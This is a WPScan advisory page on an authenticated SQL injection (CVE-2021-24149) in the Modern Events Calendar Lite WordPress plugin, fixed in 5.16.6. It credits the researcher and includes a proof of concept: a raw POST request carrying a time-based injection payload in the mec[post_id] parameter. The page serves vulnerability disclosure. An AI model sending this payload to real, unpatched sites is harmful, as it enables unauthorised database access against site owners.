WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Modern Events Calendar Lite < 5.16.6 - Authenticated SQL Injection

Description

The plugin did not sanitise the mec[post_id] POST parameter in the mec_fes_form AJAX action when logged in as an author+, leading to an authenticated SQL Injection issue. If the Frontend Event Submission form is embed in a public page, then it could lead to any authenticated user, like subscribers to perform such SQL Injection.

Proof of Concept

https://drive.google.com/file/d/1-2tvODEzr1zLb8CmIGmODe5470_YHsqX/view?usp=sharing

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wordpress-5.5/wp-admin/post.php?post=407&action=edit
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close
Cookie: [author+ cookies]

action=mec_fes_form&mec%5bpost_id%5d=1+or+sleep(1)%23&_wpnonce=212479b1e1

Affects Plugins

modern-events-calendar-lite
Fixed in version 5.16.6

References

CVE
CVE-2021-24149

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)

Submitter

khanh

Submitter website
http://research.sun-asterisk.com/
Verified

Yes

WPVDB ID
26819680-22a8-4348-b63d-dc52c0d50ed0

Timeline

Publicly Published

2021-01-29 (about 2 years ago)

Added

2021-01-29 (about 2 years ago)

Last Updated

2021-01-31 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin